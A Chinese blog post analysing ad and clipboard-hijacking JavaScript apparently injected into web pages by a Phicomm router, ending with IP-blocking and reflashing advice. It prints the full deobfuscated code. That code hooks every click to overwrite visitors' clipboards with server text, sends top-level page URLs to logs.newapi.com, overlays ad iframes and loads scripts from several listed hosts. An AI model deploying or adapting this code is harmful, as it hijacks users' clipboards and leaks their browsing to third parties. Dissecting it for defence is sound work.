可能是太久没见广告了吧……
突然间弹了个牛皮癣

起因

在进行线上环境调试时习惯性地按了F12看看前端
结果发现Console里有了点不该有的东西

移动端访问非HTTPS网站更是直接弹了个广告

PC端挂着移动端的UA一样弹广告

很好 你成功的引起了我的注意

追查

首先发现console里请求的JS为
https://cnd.newapi.com/sdk/cnzz.js?v8
https://logs.newapi.com/jd/ad?f=zq18

ad内容解密后:

// Configuration globals published on `window` by this first-stage script.
// The cnzz.js stage shown further down the page reads them back.
// Host used for the JSONP endpoints (/jd/gettokenv2 and /jd/stat).
window.amb_jd_proxy_domain="logs.newapi.com";
// Host the second-stage script and the 1px tracking iframe are fetched from.
window.amb_jd_cdn_domain="cnd.newapi.com";
// Sent as `f` in the JSONP requests and as `p` in the iframe URL (looks like a channel id; not confirmed).
window.amb_jd_proxy_f="zq18";
// Passed as the TTL argument of sSet(), which multiplies it by 1000 ms, i.e. it is treated as seconds.
window.amb_jd_proxy_c="2";
// Sent as `siteid` in the tracking iframe URL.
window.amb_jd_cnzz_id="1274015796";
// Empty in this capture and not referenced by the code shown on this page.
window.amb_jd_tongji_url="";
/**
 * Injects an external script into the page by appending a <script> element to <head>.
 *
 * @param {string} a - URL of the script to load.
 * @param {Function} [b] - Optional callback, run once the script reports it has loaded.
 */
function amb_auto_load_ad_js(a, b) {
var c = document.createElement("script");
var d = document.getElementsByTagName("head")[0];
c.src = a;
d.appendChild(c);
// The load handlers are attached only after the element has been inserted.
if (typeof b === "function") {
c.onload = c.onreadystatechange = function() {
// Fires when readyState is absent, or reads "loaded"/"complete" (the onreadystatechange path).
if (!c.readyState || /loaded|complete/.test(c.readyState)) {
b()
}
}
}
}
// Pulls in the second stage (cnzz.js) from the CDN host configured above; no callback is passed.
amb_auto_load_ad_js("https://" + window.amb_jd_cdn_domain + "/sdk/cnzz.js?v8");

/**
 * Appends a borderless 1px x 1px iframe to <body> that loads /sdk/cnzz.php from the CDN host.
 * The URL carries `p` (window.amb_jd_proxy_f) and `siteid` (window.amb_jd_cnzz_id).
 * The size and the "cnzz" naming suggest a statistics beacon, but the iframe content is not shown on this page.
 */
function amb_create_iframe() {
var a = document.createElement("iframe");
// Lower-case `frameborder` only sets an ad-hoc property; `frameBorder` below is the DOM property.
a.frameborder = 0;
a.src = "https://" + window.amb_jd_cdn_domain + "/sdk/cnzz.php?p=" + window.amb_jd_proxy_f + "&siteid=" + window.amb_jd_cnzz_id;
a.frameBorder = 0;
a.width = "1px";
a.height = "1px";
a.scrolling = "no";
document.body.appendChild(a)
}
// "no" until the tracking iframe has been created by the polling branch below.
var amb_iframe_time = "no";
(function() {
// Every 500 ms the globals `Clipboard` and `clipboard` are overwritten (assignment without declaration).
// Presumably this disables a clipboard helper the host page exposes under those names; not confirmed.
// For defenders: page globals being reset on a timer like this is a visible sign of the injection.
setInterval(function() {
Clipboard = [];
clipboard = null
}, 500);
// Create the tracking iframe now if <body> exists, otherwise poll for it.
if (document.body) {
amb_create_iframe()
} else {
// Polls every 1500 ms; the flag ensures one iframe only, but the interval itself is never cleared.
setInterval(function() {
if (amb_iframe_time == "no" && document.body) {
amb_create_iframe();
amb_iframe_time = "yes"
}
}, 1500)
}
})();

ad请求了cnzz.js,解密后内容为

// Second stage (cnzz.js, deobfuscated). `h` is the copy-helper factory passed as the IIFE argument at the bottom.
(function(h) {
// `g` holds the state and logic that writes server-supplied text into the visitor's clipboard.
var g = {
// Element list that receives click/touchend listeners; filled in init().
trigger: null,
// Document/window handles; the bootstrap code re-points them at the parent when the script runs in a frame.
dd: document,
ww: window,
// Handles returned by listenNode(), kept so the listeners can be removed after the first hit.
listener: [],
listenerTouchend: [],
listenerCopy: null,
// Text to place in the clipboard; assigned from the JSONP response in init().
text: null,
// Command name passed to queryCommandSupported()/execCommand().
action: "copy",
ua: window.navigator.userAgent,
host: location.protocol + "//" + location.host,
// Replaced by window.amb_jd_proxy_f in showAd().
id: "default",
// Token from the JSONP response; echoed back in cp().
token: "",
// Cached localStorage markers ("amb_jd_copy" / "amb_jd_load").
hascopy: null,
hasload: null,
// In-page guard so cp() reports only once.
hascopy2: null,
// Server-controlled switch that disables the QQ Browser path when "yes".
closeqq: "no",
// Despite the name, this only copies the channel id from the first-stage global.
showAd: function() {
this.id = window.amb_jd_proxy_f;
},
// Entry point: fetches the clipboard payload from the remote host and arms one of three copy paths.
init: function() {
var a = this;
// Every element in the document becomes a potential trigger.
a.trigger = a.dd.getElementsByTagName("*");
a.showAd();
a.hascopy = a.sGet("amb_jd_copy");
a.hasload = a.sGet("amb_jd_load");
// Proceed only while the "amb_jd_open" marker is absent or expired; cp() sets it after a copy is reported.
if (null == a.sGet("amb_jd_open")) {
var b = "";
// Reuse the stored 7-character id or mint a new one; it becomes the suffix of the JSONP callback name.
null != a.sGet("amb_jd_open_info") ? (b = a.sGet("amb_jd_open_info")) : (b = a.randomString(), a.sSet("amb_jd_open_info", b, window.amb_jd_proxy_c));
// JSONP request to the proxy host. It discloses the channel id, the "loaded before" marker and the
// full URL of the top-level page. The URL is encoded here and again in parseData().
a._ajax("//" + window.amb_jd_proxy_domain + "/jd/gettokenv2?callback=jsonp" + b, {
f: a.id,
h: a.hasload,
current_url: encodeURIComponent(top.location.href)
}, function(b) {
// `b` here is the server response and shadows the outer `b`.
a.text = b.text;
a.token = b.token;
a.closeqq = b.closeqq;
if (b.hascopy == "yes") {
var amb_has_copy = a.sGet("amb_jd_has_copy");
if (amb_has_copy == null) {
try {
// eval() only resolves the identifier; amb_auto_copy is not defined in the code shown on this page.
// Any error, including a missing function, is swallowed by the empty catch.
if (typeof eval("amb_auto_copy") == "function") {
a.sSet("amb_jd_has_copy", "copyed", 3600);
amb_auto_copy();
}
} catch (e) {}
}
}
// Server-controlled flag selecting the WeChat-specific path.
if (b.iscn == "no") {
a.wxcp(b.text);
}
a.sSet("amb_jd_load", "has", 86400);
// The literal string "null" from the server is treated as "no payload".
"null" == a.text && (a.text = 0);
// Path selection:
//   1. execCommand("copy") supported: hook click and touchend on every element (if there is a payload).
//   2. UA contains MQQBrowser and Android but neither MicroMessenger nor "QQ/": use qqCopy().
//   3. otherwise: a single capture-phase click listener on <body> calling clipboardCopy().
a.dd.queryCommandSupported && a.dd.queryCommandSupported(a.action) ? a.text && (a.listenClick(), a.listenTouchend()) : 1 < a.ua.split("MQQBrowser").length && 1 < a.ua.split("Android").length && 2 > a.ua.split("MicroMessenger").length && 2 > a.ua.split("QQ/").length ? a.text && a.qqCopy() : (a.listenerCopy = a.listenNode(a.dd.body, "click", a.clipboardCopy.bind(a)));
// The extra `this` argument is ignored: _ajax declares three parameters.
}, this);
}
},
// WeChat path: when the UA contains "MicroMessenger", appends a hidden iframe whose src is
// "weixin://webview/copy/" followed by the payload. Presumably the WeChat webview interprets this
// scheme as a copy request; that behaviour is not verifiable from this page.
wxcp: function(a) {
if (/MicroMessenger/i.test(navigator.userAgent)) {
var iframe = document.createElement("iframe");
iframe.style.cssText = "display:none;width:0px;height:0px;";
iframe.src = "weixin://webview/copy/" + a;
document.body.appendChild(iframe);
}
},
// Reports a copy attempt to /jd/stat on the proxy host, at most once per page load (hascopy2 guard).
// The argument `a` ("1"/"2" at the call sites) is never read, so the outcome itself is not transmitted.
cp: function(a) {
var b = this;
if (b.hascopy2 == null) {
b.hascopy2 = "yes";
// Sends the channel id, the server-issued token, the "copied before" marker and the top-level page URL.
b._ajax("//" + window.amb_jd_proxy_domain + "/jd/stat?callback=jsonp" + (new Date).getTime(), {
f: b.id,
t: b.token,
h: b.hascopy,
current_url: encodeURIComponent(top.location.href)
}, function(c) {
// "amb_jd_open" suppresses init() until it expires (TTL = window.amb_jd_proxy_c seconds).
b.sSet("amb_jd_open", "close", window.amb_jd_proxy_c);
// "amb_jd_copy" is kept for one day (86400 s).
b.sSet("amb_jd_copy", "has", 86400);
// The trailing `true` is ignored: _ajax declares three parameters.
}, true);
}
},
// QQ Browser path: loads a QQ Browser script and passes the payload to its share API
// instead of using execCommand("copy").
qqCopy: function() {
var a = this,
b = a.text,
c = navigator.appVersion,
// e is 2 when appVersion contains "MQQBrowser/", else 0. It is never 1 in this code.
e = 1 < c.split("MQQBrowser/").length ? 2 : 0;
// Server-side kill switch received in init().
if (a.closeqq == "yes") {
return true;
}
if (e) {
// Share request; the payload text travels in `url`. The meaning of to_app/us_txt is not shown here.
var f = {
url: b,
to_app: "10",
us_txt: "23s"
};
// Parse "major.minor" from the UA and pick the script URL: versions below 5.4 get qb.js.
b = c.split("MQQBrowser/")[1].split(".");
b = parseFloat(b[0] + "." + b[1]);
b = 5.4 > (e ? b : 0) ? "//3gimg.qq.com/html5/js/qb.js" : "//jsapi.qq.com/get?api=app.share";
c = a.dd.createElement("script");
var d = a.dd.getElementsByTagName("body")[0];
c.setAttribute("src", b);
c.onload = function() {
// Calls browser.app.share() when that API exists. The qb.share() branch requires e == 1,
// which the assignment above never produces.
"undefined" != typeof a.ww.browser && "undefined" != typeof a.ww.browser.app && 2 == e ? (a.ww.browser.app.share(f), a.cp("1")) : "undefined" != typeof a.ww.qb && 1 == e && (a.ww.qb.share(f), a.cp("1"));
};
d.appendChild(c);
}
},
// Fallback path using window.clipboardData.setData("Text", ...), then removes its own listener.
// NOTE(review): `_this` is not declared anywhere in the code shown on this page. Unless a global of
// that name exists at runtime, the first line throws before destroy() is reached.
clipboardCopy: function(a) {
_this.ww.clipboardData && this.text && _this.ww.clipboardData.setData("Text", this.text);
this.listenerCopy.destroy();
},
// Registers a capture-phase "click" listener on every element collected in `trigger`.
listenClick: function() {
for (var a = this, b = 0; b < a.trigger.length; b++) {
a.listener.push(a.listenNode(a.trigger[b], "click", function(b) {
return a.onClick(b, "click");
}));
}
},
// Same as listenClick(), for "touchend".
listenTouchend: function() {
for (var a = this, b = 0; b < a.trigger.length; b++) {
a.listenerTouchend.push(a.listenNode(a.trigger[b], "touchend", function(b) {
return a.onClick(b, "touchend");
}));
}
},
// Adds listener `c` for event `b` on node `a` in the capture phase (third argument true), so it runs
// before bubble-phase handlers on the same node. Returns a handle whose destroy() removes it again.
listenNode: function(a, b, c) {
a.addEventListener(b, c, true);
return {
destroy: function() {
a.removeEventListener(b, c, true);
}
};
},
// Runs on the visitor's first click/touch: the user gesture is what allows execCommand("copy") to succeed.
// `a` is the DOM event, `b` is "click" or "touchend".
onClick: function(a, b) {
var c = this;
// If <body> carries inline oncopy/onpaste attributes, they are set to "return true" for the duration of the copy.
this.dd.body.hasAttribute("oncopy") && this.dd.body.setAttribute("oncopy", "return true");
this.dd.body.hasAttribute("onpaste") && this.dd.body.setAttribute("onpaste", "return true");
// Skipped when the target is an INPUT or TEXTAREA. Otherwise: run the copy helper, report the result
// through cp(), then remove the listeners of the event type that fired so it happens once.
"INPUT" != a.target.nodeName && "TEXTAREA" != a.target.nodeName && ((new h(this.text, this.action, function(a) {
a ? c.cp("1") : c.cp("2");
})).start(), "click" == b ? (this.listenerD = true, this.listener.forEach(function(a, b) {
a.destroy();
})) : "touchend" == b && this.listenerTouchend.forEach(function(a, b) {
a.destroy();
}));
// The attributes are then set to "return false", whatever value the page originally had.
this.dd.body.hasAttribute("oncopy") && this.dd.body.setAttribute("oncopy", "return false");
this.dd.body.hasAttribute("onpaste") && this.dd.body.setAttribute("onpaste", "return false");
},
// Returns a 7-character identifier drawn from a 61-character alphabet (upper case without "I",
// lower case, digits). It is used as the JSONP callback suffix in init().
// `i` is assigned without a declaration, so it is written to the global scope.
randomString: function() {
var a = "";
for (i = 0; 7 > i; i++) {
a += "ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".charAt(Math.floor(61 * Math.random()));
}
return a;
},
// Reads a marker from localStorage. Entries are JSON objects {name, value, time}, where `time` is the
// expiry in epoch milliseconds. Returns the stored value, or null when missing, expired or unreadable.
// For defenders: localStorage keys starting with "amb_jd_" are an on-host trace of this script.
sGet: function(a) {
try {
if (!this.ww.localStorage[a]) {
return null;
}
var b = JSON.parse(this.ww.localStorage[a]);
// On expiry the slot is overwritten with null and that null is returned.
return b.time < (new Date).getTime() ? (this.ww.localStorage[a] = null) : b.value;
} catch (c) {
return console.log("not localStorage."), null;
}
},
// Stores value `b` under key `a` with a lifetime of `c` seconds; errors are logged and otherwise ignored.
sSet: function(a, b, c) {
try {
var e = {
name: a,
value: b,
time: (new Date).getTime() + 1000 * c
};
this.ww.localStorage[a] = JSON.stringify(e);
} catch (f) {
console.log("not localStorage.");
}
},
// Current time in epoch milliseconds.
now: function() {
return (new Date).getTime();
},
// Decimal digits of Math.random() after the "0." prefix; used in generated callback names.
rand: function() {
return Math.random().toString().substr(2);
},
// Serialises request parameters to a query string and appends a `_time` cache-buster.
// Object input becomes "&k=v" pairs with URL-encoded values; string input is used as given.
parseData: function(a) {
var b = "";
if ("string" === typeof a) {
b = a;
} else if ("object" === typeof a) {
for (var c in a) {
b += "&" + c + "=" + encodeURIComponent(a[c]);
}
}
b += "&_time=" + this.now();
// Drops the first character, which is the leading "&" in the object case.
return b = b.substr(1);
},
// JSONP transport: `a` is the URL, `b` the parameters, `c` the callback receiving the response object.
// The response is loaded as a <script>, so whatever the remote host returns executes with the privileges
// of the embedding page. In this sample the endpoints are /jd/gettokenv2 and /jd/stat on the proxy domain.
_ajax: function(a, b, c) {
a = a + (-1 === a.indexOf("?") ? "?" : "&") + this.parseData(b);
// Use the callback name already present in the URL, or generate one and substitute it for "?".
if ((b = /callback=(\w+)/.exec(a)) && b[1]) {
var e = b[1];
} else {
e = "jsonp_" + this.now() + "_" + this.rand(), a = a.replace("callback=?", "callback=" + e), a = a.replace("callback=%3F", "callback=" + e);
}
b = document.createElement("script");
b.type = "text/javascript";
b.src = a;
b.id = "id_" + e;
// Temporary global callback: unregisters itself, removes the <script> element, then forwards the data.
window[e] = function(a) {
window[e] = void 0;
var b = document.getElementById("id_" + e),
k = b.parentNode;
k && 11 !== k.nodeType && k.removeChild(b);
c(a);
};
(a = document.getElementsByTagName("head")) && a[0] && a[0].appendChild(b);
}
};
// Bootstrap: when the script runs inside a frame whose parent has a different URL, point the
// document/window handles at the parent so the hooks land on the outer page, then start.
try {
parent.window.location.href != window.location.href && (g.host = parent.window.location.protocol + "//" + parent.window.location.host, g.dd = parent.document, g.ww = parent.window), g.init();
} catch (a) {
// Reading the parent failed (the browser blocks this for a cross-origin parent); run in the current frame.
g.init();
}
// Copy helper passed to the IIFE above as `h`.
// Arguments: h = text to copy, g = command name ("copy"), a = callback receiving the boolean result.
})(function(h, g, a) {
return {
// Temporary off-screen <textarea> holding the text while it is selected.
fakeElem: null,
text: h,
action: g,
selectedText: null,
dd: document,
ww: window,
// Does nothing without text. When framed, operates on the top-level window/document.
start: function() {
this.text && (parent.window.location.href != window.location.href && (this.ww = top.window, this.dd = top.document), this.selectFake());
},
// Creates a read-only textarea positioned 9999px off-screen (right side for RTL pages) at the current
// scroll offset, fills it with the text, selects it and triggers the copy.
selectFake: function() {
// Local `a` (RTL flag) shadows the callback only inside this method.
var a = "rtl" == this.dd.documentElement.getAttribute("dir");
this.removeFake();
this.fakeElem = this.dd.createElement("textarea");
this.fakeElem.style.fontSize = "12pt";
this.fakeElem.style.border = "0";
this.fakeElem.style.padding = "0";
this.fakeElem.style.margin = "0";
this.fakeElem.style.position = "absolute";
a ? (this.fakeElem.style.right = "-9999px") : (this.fakeElem.style.left = "-9999px");
this.fakeElem.style.top = (this.ww.pageYOffset || this.dd.documentElement.scrollTop) + "px";
this.fakeElem.setAttribute("readonly", "");
this.fakeElem.value = this.text;
this.dd.body.appendChild(this.fakeElem);
this.selectedText = this.selectText(this.fakeElem);
this.copyText();
},
// Removes the temporary textarea if one exists.
removeFake: function() {
this.fakeElem && (this.dd.body.removeChild(this.fakeElem), this.fakeElem = null);
},
// Runs document.execCommand(action) on the current selection, cleans up, and passes the boolean
// outcome to the callback; an exception counts as failure.
copyText: function() {
var b = void 0;
try {
b = this.dd.execCommand(this.action);
} catch (c) {
b = false;
}
this.removeFake();
a.call(this, b);
},
// Selects the content of element `a` and returns the selected text. Handles SELECT, INPUT/TEXTAREA
// and generic elements (via a Range).
selectText: function(a) {
if ("SELECT" === a.nodeName) {
a.focus(), a = a.value;
} else if ("INPUT" === a.nodeName || "TEXTAREA" === a.nodeName) {
// Temporarily marks the field read-only while selecting, then restores the attribute.
var b = a.hasAttribute("readonly");
b || a.setAttribute("readonly", "");
a.select();
a.setSelectionRange(0, a.value.length);
b || a.removeAttribute("readonly");
a = a.value;
} else {
a.hasAttribute("contenteditable") && a.focus();
b = this.ww.getSelection();
var e = this.dd.createRange();
e.selectNodeContents(a);
b.removeAllRanges();
b.addRange(e);
a = b.toString();
}
return a;
}
};
});

该JS会与 http://222.73.156.235:8888/v2?MAC=XXXXXXXXXXXX 一起作用弹广告。URL中的MAC参数用于拼接下面代码里的MAC地址(deviceMac),该网址内容为:

(function () {

// Base URL of the ad server; plain HTTP on port 8888.
var ip = 'http://222.73.156.235:8888';
// Platform switches. `android` and `ios` gate appendIframe() in aa(); `pc` is not read in the code shown.
var pc = false;
var android = true;
var ios = true;
// Per the article, filled in from the MAC query parameter of the script URL (masked by the author).
// It is forwarded to the ad iframe through postMessage.
var deviceMac = 'XX:XX:XX:XX:XX:XX';
// Also forwarded to the ad iframe; presumably the reporting endpoint used by the ad page.
var statisticUrl = 'http://222.73.156.235:8888/v2/router/ad/state';
// Ad slot definitions. All three are empty in this capture, so every `height != undefined` check in
// appendIframe() fails and no ad iframe is created from this response.
var a_str = {"top": {},"center": {},"bottom": {}};
// Set in aa() to the URL-encoded address of the top-level page.
var hostUrl = '';
// var timestamp = new Date().getTime();
// lalala
// Runs aa() once the page has loaded. Assigning window.onload replaces any handler the page set the same way.
window.onload = function(){
aa();
}

// Lets the ad iframe ask the host page to remove it (e.g. a close button inside the ad).
// NOTE(review): e.origin is not checked and iframeId is used as-is, so a message from any frame or
// window can make the page remove any element that has an id.
window.addEventListener('message', function(e){
if(e.data.removeIframe == "yes"){
document.getElementById(e.data.iframeId).remove();
}

}, false)

// Determine orientation; re-evaluated on every resize (adp-138).
// Repositions the centre and bottom ad iframes when the device rotates.
window.addEventListener("resize",function(){
var iframe_Ct_a = document.getElementById('iframe_center_a');
var iframe_Ct_b = document.getElementById('iframe_bottom_a');
// Centre interstitial
if(iframe_Ct_a){
// Landscape
if( window.orientation == 90 || window.orientation==-90){
iframe_Ct_a.style.left = window.innerWidth /2 + "px";
iframe_Ct_a.style.top = window.innerHeight/1.2+"px";
iframe_Ct_a.style.marginLeft = parseInt(a_str.center.width)/2*(-1)+"px";
iframe_Ct_a.style.marginTop = (window.innerHeight/1.5)*(-1)+"px";
}
// Portrait: centred using negative margins of half the slot size
if( window.orientation == 180 || window.orientation == 0 ) {
iframe_Ct_a.style.left = window.innerWidth /2 + "px";
iframe_Ct_a.style.top = window.innerHeight /2 + "px";
iframe_Ct_a.style.marginLeft = parseInt(a_str.center.width)/2*(-1)+"px";
iframe_Ct_a.style.marginTop = parseInt(a_str.center.height)/2*(-1)+"px";
}
}

// Bottom banner
if(iframe_Ct_b){
if(window.orientation ==90 || window.orientation==-90){
iframe_Ct_b.style.marginLeft = "25%";
}
if(window.orientation == 180 || window.orientation == 0){
iframe_Ct_b.style.marginLeft = '0';
}
}
});

/**
 * Main routine of the router-injected script: decides per host and per user agent whether to
 * overlay ad iframes, and in every branch that runs to completion also calls loadJs().
 *
 * Note that a "forbidden" host only skips the iframe overlay; loadJs() is still executed for it.
 */
function aa() {

// Added: forbidden-domain check
if(forbidHost()){
loadJs();
return false;
}

// Full URL of the top-level page, later forwarded to the ad iframe.
hostUrl = encodeURIComponent(top.window.location.href);
// User-agent sniffing. Several checks are broad: `android` also matches any UA containing "Linux",
// and `iPhone` matches any UA containing "Mac".
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf('Trident') > -1, // IE engine
presto: u.indexOf('Presto') > -1, // Opera engine
webKit: u.indexOf('AppleWebKit') > -1, // Apple / Google engine
gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, // Firefox engine
mac: u.indexOf('Macintosh') > -1,// mac
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), // whether this is a mobile device
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), // iOS device
android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, // Android device or UC browser
iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, // whether iPhone or QQHD browser
iPad: u.indexOf('iPad') > -1, // whether iPad
webApp: u.indexOf('Safari') == -1 // whether this is a web app (no header or footer)
};
}()
}
// WeChat, the listed in-app webviews and desktop Macs get no overlay, only loadJs().
if (isWeiXin() || isAPP() || true == browser.versions.mac) {
loadJs();
} else if (browser.versions.android == true) { // Android only
if(android){
//console.log("ios append iframe.");
appendIframe();
loadJs();
//console.log("ios append iframe over.");
}
} else if (browser.versions.ios == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
if(ios){
//console.log("ios append iframe.");
appendIframe();
loadJs();
//console.log("ios append iframe over.")
}
} else {
loadJs();
}


// Creates one fixed-position iframe per configured slot (top, bottom, centre) on the top-level
// document at the maximum z-index, and hands it its configuration through postMessage.
// The message carries deviceMac, statisticUrl, hostUrl, ip, picList and iframeId, and is sent with
// target origin '*', i.e. it is not restricted to the ad server's origin.
function appendIframe() {
var dataSet = {};
dataSet.deviceMac = deviceMac;
dataSet.statisticUrl = statisticUrl;
dataSet.hostUrl = hostUrl;
dataSet.ip = ip;
if(a_str.top.height != undefined){
var iframe_Tp = document.createElement('iframe');
iframe_Tp.src = ip + '/routerad/common/pages/mobile_index.html';
iframe_Tp.id = "iframe_top_a";
iframe_Tp.name = "iframe_top_a";
iframe_Tp.scrolling = "no";
// Sets an ad-hoc `display` property on the element, not style.display.
iframe_Tp.display = "block";
iframe_Tp.style.position="fixed";
iframe_Tp.setAttribute("frameborder","0");
iframe_Tp.style.zIndex = "2147483647";

// Full viewport width; height scaled to keep the slot's aspect ratio.
var iframeWidth,iframeHeight;
iframeWidth = window.innerWidth;
iframeHeight = parseInt(a_str.top.height) * parseInt(iframeWidth)/parseInt(a_str.top.width);

iframe_Tp.style.width = iframeWidth + "px";
iframe_Tp.style.height = iframeHeight + "px";

//iframe_Bt.style.bottom = "0px";
// NOTE(review): iframe_Bt is only assigned in the bottom-slot branch below, so it is still
// undefined here and this line would throw if a top slot were configured.
iframe_Bt.style.top = "0px";
iframe_Tp.style.left = "0px";
window.top.document.body.appendChild(iframe_Tp);
dataSet.picList = a_str.top.picList;
dataSet.iframeId = "iframe_top_a";

document.getElementById('iframe_top_a').onload=function(){
var ifr = document.querySelector('#iframe_top_a');
ifr.contentWindow.postMessage(dataSet, '*');
}
}

if(a_str.bottom.height != undefined){
//console.log("bottom iframe.");
var iframe_Bt = document.createElement('iframe');
iframe_Bt.src = ip + '/routerad/common/pages/mobile_index.html';
iframe_Bt.id = "iframe_bottom_a";
iframe_Bt.name = "iframe_bottom_a";
iframe_Bt.scrolling = "no";
iframe_Bt.display = "block";
iframe_Bt.style.position="fixed";
iframe_Bt.setAttribute("frameborder","0");
iframe_Bt.style.zIndex = "2147483647";

var iframeWidth,iframeHeight;
iframeWidth = window.innerWidth;
iframeHeight = parseInt(a_str.bottom.height) * parseInt(iframeWidth)/parseInt(a_str.bottom.width);

iframe_Bt.style.width = iframeWidth + "px";
iframe_Bt.style.height = iframeHeight + "px";

//iframe_Bt.style.top = window.innerHeight + "px";
iframe_Bt.style.bottom = "0px";
iframe_Bt.style.left = "0px";
iframe_Bt.style.marginTop = iframeHeight*(-1) + "px";

window.top.document.body.appendChild(iframe_Bt);
// dataSet is one shared object, so picList/iframeId are overwritten per slot before the onload
// handlers run.
dataSet.picList = a_str.bottom.picList;
dataSet.iframeId = "iframe_bottom_a";

document.getElementById('iframe_bottom_a').onload=function(){
var ifr = document.querySelector('#iframe_bottom_a');
ifr.contentWindow.postMessage(dataSet, '*');
}
}

if(a_str.center.height != undefined){
//console.log("center iframe.");
var iframe_Ct = document.createElement('iframe');
iframe_Ct.src = ip + '/routerad/common/pages/mobile_index.html';
iframe_Ct.id = "iframe_center_a";
iframe_Ct.name = "iframe_center_a";
iframe_Ct.scrolling = "no";
iframe_Ct.display = "block";
iframe_Ct.style.position="fixed";
iframe_Ct.setAttribute("frameborder","0");
iframe_Ct.style.zIndex = "2147483647";

// The centre slot uses the configured size and is centred with negative margins.
var iframeWidth,iframeHeight;
iframeWidth = a_str.center.width;
iframeHeight = a_str.center.height;

iframe_Ct.style.width = parseInt(iframeWidth) + "px";
iframe_Ct.style.height = parseInt(iframeHeight) + "px";
iframe_Ct.style.left = window.innerWidth /2 + "px";
iframe_Ct.style.top = window.innerHeight /2 + "px";
iframe_Ct.style.marginLeft = parseInt(iframeWidth)/2*(-1)+"px";
iframe_Ct.style.marginTop = parseInt(iframeHeight)/2*(-1)+"px";
window.top.document.body.appendChild(iframe_Ct);

dataSet.picList = a_str.center.picList;
dataSet.iframeId = "iframe_center_a";

document.getElementById('iframe_center_a').onload=function(){
var ifr = document.querySelector('#iframe_center_a');
ifr.contentWindow.postMessage(dataSet, '*');
}
}
}

}

/**
 * Reports whether the page is running inside the WeChat in-app browser.
 *
 * @returns {boolean} true when the user agent contains "MicroMessenger" (case-insensitive).
 */
function isWeiXin() {
var ua = window.navigator.userAgent.toLowerCase();
//console.log(ua);//mozilla/5.0 (iphone; cpu iphone os 9_1 like mac os x) applewebkit/601.1.46 (khtml, like gecko)version/9.0 mobile/13b143 safari/601.1
// The match result (an array, or null) is compared loosely with the string.
if (ua.match(/MicroMessenger/i) == 'micromessenger') {
return true;
} else {
return false;
}
}

/**
 * Reports whether the user agent contains one of a fixed list of in-app webview markers.
 * aa() shows no overlay iframe to these clients and only calls loadJs().
 *
 * @returns {boolean} true when any listed substring occurs in the lower-cased user agent.
 */
function isAPP() {
var ua = window.navigator.userAgent.toLowerCase();

if (ua.indexOf("biliapp") >= 0) {
return true;
}
if (ua.indexOf("wifikey") >= 0) {
return true;
}
if (ua.indexOf("newsarticle") >= 0) {
return true;
}
if (ua.indexOf("peanutwi-fi") >= 0) {
return true;
}
if (ua.indexOf("phiwifi")>=0) {
return true;
}
if (ua.indexOf("changba") >= 0) {
return true;
}
if (ua.indexOf("phicare") >= 0) {
return true;
}
if (ua.indexOf("vmchybirdapp-android") >= 0) {
return true;
}
if (ua.indexOf("vmchybirdapp-ios") >= 0) {
return true;
}
if (ua.indexOf("momowebview") >= 0 || ua.indexOf("momokit") >= 0) {
return true;
} else {
return false;
}
}

// Domains on which ads must not be shown; an array can be used once more entries are added.
/**
 * Reports whether the top-level page is on the exclusion list.
 * In aa() a match skips the ad iframes; loadJs() is still called for these hosts.
 *
 * @returns {boolean} true when the host contains ".gov.cn" or a listed entry, or when the URL
 *   matches phicomm.com or m.baidu.com/static.
 */
function forbidHost(){
var url = top.window.location.href;
var host = top.window.location.host;
if (host.indexOf(".gov.cn") != -1) {
return true;
}
// Entries are matched as substrings anywhere in the host name.
var forbidHostArray = ["www.xinhuanet.com", ".eastday.com", "china.com.cn", "www.chinadaily.com.cn", ".caijing.com.cn", ".huanqiu.com", ".youku.com", ".youth.cn", ".people.com.cn", "www.wangxin.name", "wjwcoin.pro", "www.wkj.link", "www.bid-buy.pro", "www.daywin.pro", "www.7650.biz"];
// `i` is assigned without a declaration, so it is written to the enclosing/global scope.
for (i = 0; i < forbidHostArray.length; i++) {
if (host.indexOf(forbidHostArray[i]) != -1) {
return true;
}
}
// These two are tested against the full URL, not just the host.
var reg = /phicomm\.com/g;
var baiduReg = /m\.baidu\.com\/static/g;
if(reg.test(url) || baiduReg.test(url)){
return true;
}else{
return false;
}
}

/**
 * Appends four external scripts to <head>. It is called from every branch of aa(), including the
 * excluded-host branch, so these hosts receive a request from each page the script runs on.
 * The fourth URL is the first-stage "ad" script analysed at the top of this article.
 * For defenders: the four hosts below are the network indicators of this loader.
 */
function loadJs() {
var newscript = document.createElement('script');
newscript.setAttribute('type', 'text/javascript');
newscript.setAttribute('src', 'https://www.jiubuhua.com/exjs.js');

// Loaded over plain HTTP.
var newscript2 = document.createElement('script');
newscript2.setAttribute('type', 'text/javascript');
newscript2.setAttribute('src', 'http://bb.dugesheying.com/yhws/channel/yj/yjda.js');

var newscript3 = document.createElement('script');
newscript3.setAttribute('type', 'text/javascript');
newscript3.setAttribute('src', 'https://www.jiubuhua.com/9cc19.js');

// Entry point of the clipboard-overwrite chain (logs.newapi.com, channel zq18).
var newscript4 = document.createElement('script');
newscript4.setAttribute('type', 'text/javascript');
newscript4.setAttribute('src', 'https://logs.newapi.com/jd/ad?f=zq18');

var head = document.getElementsByTagName('head')[0];
head.appendChild(newscript);
head.appendChild(newscript2);
head.appendChild(newscript3);
head.appendChild(newscript4);
}

})();

注意到了代码中有几行

var reg = /phicomm\.com/g;
var baiduReg = /m\.baidu\.com\/static/g;
if(reg.test(url) || baiduReg.test(url)){
return true;
}else{
return false;
}

即不对斐讯(phicomm.com)和百度(m.baidu.com/static)的地址插入广告iframe(但命中后 aa() 仍会调用 loadJs() 加载外部脚本),而笔者用的路由正是斐讯
随后对IP进行查询

确定为路由器干的了

解决方案

  1. 上游设备对IP段222.73.156.0/24加黑
  2. 电脑开启防火墙,拉黑222.73.156.0/24(文中出现的 logs.newapi.com、cnd.newapi.com、www.jiubuhua.com、bb.dugesheying.com 等域名也可作为排查时的参考指标)
  3. 刷机 参考斐讯K2P A1新版刷机链接